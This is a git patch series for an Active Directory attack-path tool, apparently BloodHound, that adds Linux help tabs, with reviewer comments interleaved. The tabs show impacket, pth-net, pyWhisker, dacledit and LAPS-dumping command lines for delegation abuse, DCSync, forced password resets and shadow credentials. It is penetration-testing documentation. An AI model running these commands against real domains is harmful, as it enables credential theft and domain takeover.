8c6b1e5d2269b423747589d4c64a7ca054a2b278 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 16:37:11 +0100 Subject: [PATCH 09/32] AllowedToAct Linux abuse --- .../HelpTexts/AllowedToAct/AllowedToAct.jsx | 14 ++++--- .../HelpTexts/AllowedToAct/LinuxAbuse.jsx | 37 +++++++++++++++++++ .../HelpTexts/AllowedToAct/References.jsx | 8 ++++ .../{Abuse.jsx => WindowsAbuse.jsx} | 6 +-- 4 files changed, 57 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/AllowedToAct/{Abuse.jsx => WindowsAbuse.jsx} (93%) 
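Review bot: The hunk adds `https://www.youtube.com/watch?v=z8thoG7gPd0` a second time, directly under the context line that already carries the same URL, so the first added `<br />`/link pair should be dropped. The three thehacker.recipes links that follow are the useful part of the change.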
diff --git a/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx b/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx index 2c3314e67..51a2014a4 100644 --- a/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx +++ b/src/components/Modals/HelpTexts/AllowedToAct/AllowedToAct.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -16,13 +17,16 @@ const AllowedToAct = ({ sourceName, sourceType, targetName, targetType }) => { targetName={targetName} />
- - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx new file mode 100644 index 000000000..4360a5956 --- /dev/null +++ b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx @@ -0,0 +1,37 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ sourceName }) => { + return ( + <> + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +
+                
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                
+            
+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +
+                
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                
+            
+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. + + ); +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/AllowedToAct/References.jsx b/src/components/Modals/HelpTexts/AllowedToAct/References.jsx index fd36e6918..e839d9ec7 100644 --- a/src/components/Modals/HelpTexts/AllowedToAct/References.jsx +++ b/src/components/Modals/HelpTexts/AllowedToAct/References.jsx @@ -26,6 +26,14 @@ const References = () => { https://github.com/Kevin-Robertson/Powermad#new-machineaccount +
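Review bot: The opening paragraph and the addcomputer.py example do not fit this edge: AllowedToAct means `{sourceName}` is already listed in the target's msDS-AllowedToActOnBehalfOfOtherIdentity, so a freshly created computer account is not trusted by the target and cannot complete S4U2proxy here — that step belongs to AddAllowedToAct, where the attacker can also write the attribute. The getST.py example should instead authenticate as the source principal, e.g. `'domain/{sourceName}:password'` (or `-hashes` when only the hash is known); `sourceName` is already destructured and declared in propTypes but never rendered, which looks like the remnant of that intent. As in the sibling tab, a sentence on consuming the resulting `.ccache` with `export KRB5CCNAME=...` and `-k -no-pass` would complete the chain, together with the caveat that S4U2self fails for accounts in Protected Users or marked "sensitive and cannot be delegated".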
+ + https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd + +
+ + https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota + ); }; diff --git a/src/components/Modals/HelpTexts/AllowedToAct/Abuse.jsx b/src/components/Modals/HelpTexts/AllowedToAct/WindowsAbuse.jsx similarity index 93% rename from src/components/Modals/HelpTexts/AllowedToAct/Abuse.jsx rename to src/components/Modals/HelpTexts/AllowedToAct/WindowsAbuse.jsx index b0e9270f9..883e9a97d 100644 --- a/src/components/Modals/HelpTexts/AllowedToAct/Abuse.jsx +++ b/src/components/Modals/HelpTexts/AllowedToAct/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ sourceName }) => { +const WindowsAbuse = ({ sourceName }) => { return ( <>

@@ -38,8 +38,8 @@ const Abuse = ({ sourceName }) => { ); }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, }; -export default Abuse; +export default WindowsAbuse; From 920c0e0c0b0ceef8dd5bb63af332675aec2c0231 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 16:47:44 +0100 Subject: [PATCH 10/32] AllowedToDelegate Linux abuse --- .../AllowedToDelegate/AllowedToDelegate.jsx | 14 ++++++--- .../AllowedToDelegate/LinuxAbuse.jsx | 31 +++++++++++++++++++ .../AllowedToDelegate/References.jsx | 3 ++ .../{Abuse.jsx => WindowsAbuse.jsx} | 4 +-- 4 files changed, 45 insertions(+), 7 deletions(-) create mode 100644 src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/AllowedToDelegate/{Abuse.jsx => WindowsAbuse.jsx} (96%) diff --git a/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx b/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx index f4630b7f4..293985e76 100644 --- a/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx +++ b/src/components/Modals/HelpTexts/AllowedToDelegate/AllowedToDelegate.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -21,13 +22,16 @@ const AllowedToDelegate = ({ targetName={targetName} /> - - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx new file mode 100644 index 000000000..0239cfb01 --- /dev/null +++ b/src/components/Modals/HelpTexts/AllowedToDelegate/LinuxAbuse.jsx @@ -0,0 +1,31 @@ +import React from 'react'; + +const LinuxAbuse = () => { + return ( + <> +

+ In the following example, *victim* is the attacker-controlled + account (i.e. the hash is known) that is configured for + constrained delegation. That is, *victim* has the + "HTTP/PRIMARY.testlab.local" service principal name (SPN) set in + its msds-AllowedToDelegateTo property. The command first + requests a TGT for the *victim* user and executes the + S4U2self/S4U2proxy process to impersonate the "admin" user to + the "HTTP/PRIMARY.testlab.local" SPN. The alternative sname + "cifs" is substituted in to the final service ticket. This grants + the attacker the ability to access the file system of + PRIMARY.testlab.local as the "admin" user. +

+ +
+                
+                    {
+                        "getST.py -spn 'HTTP/PRIMARY.testlab.local' -impersonate 'admin' -altservice 'cifs' -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'domain/victim'"
+                    }
+                
+            
+ + ); +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx b/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx index 924f7a56e..1145c5905 100644 --- a/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx +++ b/src/components/Modals/HelpTexts/AllowedToDelegate/References.jsx @@ -30,6 +30,9 @@ const References = () => { https://blog.harmj0y.net/redteaming/another-word-on-delegation/ + + https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained + ); }; diff --git a/src/components/Modals/HelpTexts/AllowedToDelegate/Abuse.jsx b/src/components/Modals/HelpTexts/AllowedToDelegate/WindowsAbuse.jsx similarity index 96% rename from src/components/Modals/HelpTexts/AllowedToDelegate/Abuse.jsx rename to src/components/Modals/HelpTexts/AllowedToDelegate/WindowsAbuse.jsx index 81e383115..7fb502b3f 100644 --- a/src/components/Modals/HelpTexts/AllowedToDelegate/Abuse.jsx +++ b/src/components/Modals/HelpTexts/AllowedToDelegate/WindowsAbuse.jsx @@ -1,6 +1,6 @@ import React from 'react'; -const Abuse = () => { +const WindowsAbuse = () => { return ( <>
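Review bot: The prose in the new LinuxAbuse component wraps the account name in literal asterisks (`*victim*`, three times), which JSX renders as asterisks rather than emphasis; use `<i>victim</i>`, or plain quotes as the same paragraph already does for "admin". Also "substituted in to the final service ticket" should read "substituted into". The text states the outcome (`-altservice 'cifs'` yields access to the file system of PRIMARY.testlab.local) but not why the substitution works; a short sentence noting that the alternate service must be on the same host as the allowed SPN — presumably because the service ticket is encrypted with that host account's key, so the sname itself is not what gets validated — would stop readers from trying `-altservice` against a different host.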

@@ -35,4 +35,4 @@ const Abuse = () => { ); }; -export default Abuse; +export default WindowsAbuse; From aac965badd1abe3b21d2df480e6696fbad17a9d4 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 16:54:01 +0100 Subject: [PATCH 11/32] DCSync Linux abuse --- .../Modals/HelpTexts/DCSync/DCSync.jsx | 14 ++++++---- .../Modals/HelpTexts/DCSync/LinuxAbuse.jsx | 28 +++++++++++++++++++ .../Modals/HelpTexts/DCSync/References.jsx | 4 +++ .../DCSync/{Abuse.jsx => WindowsAbuse.jsx} | 4 +-- 4 files changed, 43 insertions(+), 7 deletions(-) create mode 100644 src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/DCSync/{Abuse.jsx => WindowsAbuse.jsx} (92%) diff --git a/src/components/Modals/HelpTexts/DCSync/DCSync.jsx b/src/components/Modals/HelpTexts/DCSync/DCSync.jsx index db59f816b..be48624bd 100644 --- a/src/components/Modals/HelpTexts/DCSync/DCSync.jsx +++ b/src/components/Modals/HelpTexts/DCSync/DCSync.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -16,13 +17,16 @@ const DCSync = ({ sourceName, sourceType, targetName, targetType }) => { targetName={targetName} /> - - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx new file mode 100644 index 000000000..07137601a --- /dev/null +++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx @@ -0,0 +1,28 @@ +import React from 'react'; + +const LinuxAbuse = () => { + return ( + <> +

+ You may perform a dcsync attack to get the password hash of an + arbitrary principal using impacket's secretsdump.py example script: +

+ +
+                    
+                        {
+                            "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        }
+                    
+            
+ +

+ You can also perform the more complicated ExtraSids attack to + hop domain trusts. For information on this see the blog post by + harmj0y in the references tab. +

+ + ); +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/DCSync/References.jsx b/src/components/Modals/HelpTexts/DCSync/References.jsx index c9efb1890..ee2a95b3a 100644 --- a/src/components/Modals/HelpTexts/DCSync/References.jsx +++ b/src/components/Modals/HelpTexts/DCSync/References.jsx @@ -10,6 +10,10 @@ const References = () => { https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ +
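Review bot: The example `secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'` authenticates as Administrator, which obscures the point of this edge — it is the controlled principal holding the replication rights that makes DCSync work — and the prose above it says `secretsdump.py` while the command drops the `.py` suffix the other impacket examples in this series use (`getST.py`, `addcomputer.py`, `dacledit.py`). Suggest `secretsdump.py -just-dc-user 'TargetUser' 'DOMAIN'/'ControlledUser':'Password'@'DomainController'` (or `-just-dc` to dump every account), with the same placeholder names as the ForceChangePassword and GenericAll Linux texts. As far as I recall, without a `-just-dc*` flag secretsdump first attempts the remote-registry SAM/LSA dumps, which require local admin on the DC and only produce failures and noise when the principal merely has replication rights — worth a sentence in the text. The closing paragraph points to harmj0y's mimikatz ExtraSids write-up, which is Windows tooling; on the Linux tab either say so explicitly or drop the paragraph.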
+ + https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + ); }; diff --git a/src/components/Modals/HelpTexts/DCSync/Abuse.jsx b/src/components/Modals/HelpTexts/DCSync/WindowsAbuse.jsx similarity index 92% rename from src/components/Modals/HelpTexts/DCSync/Abuse.jsx rename to src/components/Modals/HelpTexts/DCSync/WindowsAbuse.jsx index 296a5a79a..eda3c16b0 100644 --- a/src/components/Modals/HelpTexts/DCSync/Abuse.jsx +++ b/src/components/Modals/HelpTexts/DCSync/WindowsAbuse.jsx @@ -1,6 +1,6 @@ import React from 'react'; -const Abuse = () => { +const WindowsAbuse = () => { return ( <>

@@ -23,4 +23,4 @@ const Abuse = () => { ); }; -export default Abuse; +export default WindowsAbuse; From b7f2d709e66f402decc4c0f05960c21f1e087ab5 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 16:59:07 +0100 Subject: [PATCH 12/32] ForceChangePassword Linux abuse --- .../ForceChangePassword.jsx | 14 ++++-- .../ForceChangePassword/LinuxAbuse.jsx | 49 +++++++++++++++++++ .../ForceChangePassword/References.jsx | 4 ++ .../{Abuse.jsx => WindowsAbuse.jsx} | 6 +-- 4 files changed, 65 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/ForceChangePassword/{Abuse.jsx => WindowsAbuse.jsx} (96%) diff --git a/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx b/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx index b132e6d14..8b7a9732e 100644 --- a/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx +++ b/src/components/Modals/HelpTexts/ForceChangePassword/ForceChangePassword.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -22,13 +23,16 @@ const ForceChangePassword = ({ targetType={targetType} /> - - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx new file mode 100644 index 000000000..d44818225 --- /dev/null +++ b/src/components/Modals/HelpTexts/ForceChangePassword/LinuxAbuse.jsx @@ -0,0 +1,49 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ sourceName, sourceType }) => { + return ( + <> +

+ Use samba's net tool to change the user's password. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line. The new password will be prompted + if omitted from the command line. +

+ +
+                
+                    {
+                        'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                
+            
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                
+                    {
+                        'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                
+            
+

+ Now that you know the target user's plain text password, you can + either start a new agent as that user, or use that user's + credentials in conjunction with PowerView's ACL abuse functions, + or perhaps even RDP to a system the target user has access to. + For more ideas and information, see the references tab. +

+ + ); +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx b/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx index 3b399596a..e61d89124 100644 --- a/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx +++ b/src/components/Modals/HelpTexts/ForceChangePassword/References.jsx @@ -18,6 +18,10 @@ const References = () => { https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4724 +
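Review bot: The closing paragraph of the new Linux text tells the reader to use the new password "in conjunction with PowerView's ACL abuse functions", which is carried over from the Windows tab and does not apply here; rephrase it to the Linux tooling this series uses, e.g. "with samba's net or impacket's tooling shown in the other Linux abuse tabs". Typo in the pass-the-hash sentence: "it must be replace with" → "it must be replaced with". The component destructures `sourceName` and `sourceType` and declares them in propTypes, but the body never reads them (no `{sourceName}` interpolation, unlike the Windows component that takes the same props, presumably to interpolate them); either work them into the text or drop the unused props and the PropTypes import so a linter does not flag them. The text already hints that credentials can be prompted interactively; it would be worth saying why — a cleartext password or hash given on the command line ends up in shell history and is visible in the process list.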
+ + https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword + ); }; diff --git a/src/components/Modals/HelpTexts/ForceChangePassword/Abuse.jsx b/src/components/Modals/HelpTexts/ForceChangePassword/WindowsAbuse.jsx similarity index 96% rename from src/components/Modals/HelpTexts/ForceChangePassword/Abuse.jsx rename to src/components/Modals/HelpTexts/ForceChangePassword/WindowsAbuse.jsx index 11946e6de..0efd399e2 100644 --- a/src/components/Modals/HelpTexts/ForceChangePassword/Abuse.jsx +++ b/src/components/Modals/HelpTexts/ForceChangePassword/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ sourceName, sourceType }) => { +const WindowsAbuse = ({ sourceName, sourceType }) => { return ( <>

@@ -69,9 +69,9 @@ const Abuse = ({ sourceName, sourceType }) => { ); }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, }; -export default Abuse; +export default WindowsAbuse; From 810603ea3949dca7a25e055cf495ff55958bf7ec Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 17:37:04 +0100 Subject: [PATCH 13/32] GenericAll Linux abuse --- .../HelpTexts/GenericAll/GenericAll.jsx | 20 +- .../HelpTexts/GenericAll/LinuxAbuse.jsx | 489 ++++++++++++++++++ .../HelpTexts/GenericAll/References.jsx | 32 ++ .../{Abuse.jsx => WindowsAbuse.jsx} | 6 +- 4 files changed, 539 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/GenericAll/{Abuse.jsx => WindowsAbuse.jsx} (99%) diff --git a/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx b/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx index 16f328114..4b566732e 100644 --- a/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx +++ b/src/components/Modals/HelpTexts/GenericAll/GenericAll.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -23,8 +24,8 @@ const GenericAll = ({ targetType={targetType} /> - - + - + + + + - + diff --git a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx new file mode 100644 index 000000000..49258b644 --- /dev/null +++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx 
@@ -0,0 +1,489 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ + sourceName, + sourceType, + targetName, + targetType, + targetId, + haslaps, +}) => { + switch (targetType) { + case 'Group': + return ( + <> +

+ Full control of a group allows you to directly modify + group membership of the group. +

+ +

+ Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line: +

+ +
+                        
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Finally, verify that the user was successfully added to the group: +

+ +
+                        
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ + ); + case 'User': + return ( + <> +

+ Full control of a user allows you to modify properties + of the user to perform a targeted kerberoast attack, and + also grants the ability to reset the password of the + user without knowing their current one. +

+ +

Targeted Kerberoast

+ +

+ A targeted kerberoast attack can be performed using{' '} + targetedKerberoast.py. +

+ +
+                        
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        
+                    
+ +

+ The tool will automatically attempt a targetedKerberoast + attack, either on all users or against a specific one if + specified in the command line, and then obtain a crackable hash. + The cleanup is done automatically as well. +

+ +

+ The recovered hash can be cracked offline using the tool + of your choice. +

+ +

Force Change Password

+ +

+ Use samba's net tool to change the user's password. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line. The new password will be prompted + if omitted from the command line. +

+ +
+                        
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+

+ Now that you know the target user's plain text password, you can + either start a new agent as that user, or use that user's + credentials in conjunction with PowerView's ACL abuse functions, + or perhaps even RDP to a system the target user has access to. + For more ideas and information, see the references tab. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                        {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                    
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + case 'Computer': + if (haslaps) { + return ( + <> +

Retrieve LAPS Password

+ +

+ Full control of a computer object is abusable when + the computer's local admin account credential is + controlled with LAPS. The clear-text password for + the local administrator account is stored in an + extended attribute on the computer object called + ms-Mcs-AdmPwd. With full control of the computer + object, you may have the ability to read this + attribute, or grant yourself the ability to read the + attribute by modifying the computer object's + security descriptor. +

+ +

+ LAPSDumper can be used + to retrieve LAPS passwords: +

+ +
+                            
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            
+                        
+ +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                            
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            
+                        
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                            
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            
+                        
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                            {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                        
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + } else { + return ( + <> +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                            
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            
+                        
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                            
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            
+                        
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                            {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                        
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + } + case 'Domain': + return ( + <> +

DCSync

+ +

+ The AllExtendedRights privilege grants {sourceName} both the + DS-Replication-Get-Changes and + DS-Replication-Get-Changes-All privileges, which combined + allow a principal to replicate objects from the domain{' '} + {targetName}. +

+ +

+ This can be abused using Impacket's secretsdump.py example script: +

+ +
+                            
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            
+                    
+ +

Retrieve LAPS Passwords

+ +

+ The AllExtendedRights privilege also grants {sourceName} enough{' '} + privileges, to retrieve LAPS passwords domain-wise. +

+ +

+ LAPSDumper can be used + for that purpose: +

+ +
+                        
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        
+                    
+ + ); + case 'GPO': + return ( + <> +

+ With full control of a GPO, you may make modifications + to that GPO which will then apply to the users and + computers affected by the GPO. Select the target object + you wish to push an evil policy down to, then use the + gpedit GUI to modify the GPO, using an evil policy that + allows item-level targeting, such as a new immediate + scheduled task. Then wait at least 2 hours for the group + policy client to pick up and execute the new evil + policy. See the references tab for a more detailed write + up on this abuse`; +

+ +

+ pyGPOAbuse.py can be used for that purpose. +

+ + ); + case 'OU': + return ( + <> +

Control of the Organization Unit

+ +

+ With full control of the OU, you may add a new ACE on + the OU that will inherit down to the objects under that + OU. Below are two options depending on how targeted you + choose to be in this step: +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

+ + ); + case 'OU': + return ( + <> +

Control of the Organization Unit

+ +

+ With full control of the OU, you may add a new ACE on + the OU that will inherit down to the objects under that + OU. Below are two options depending on how targeted you + choose to be in this step: +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

+ + ); + case 'Container': + return ( + <> +

Control of the Container

+ +

+ With full control of the container, you may add a new ACE on + the container that will inherit down to the objects under that + OU. Below are two options depending on how targeted you + choose to be in this step: +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

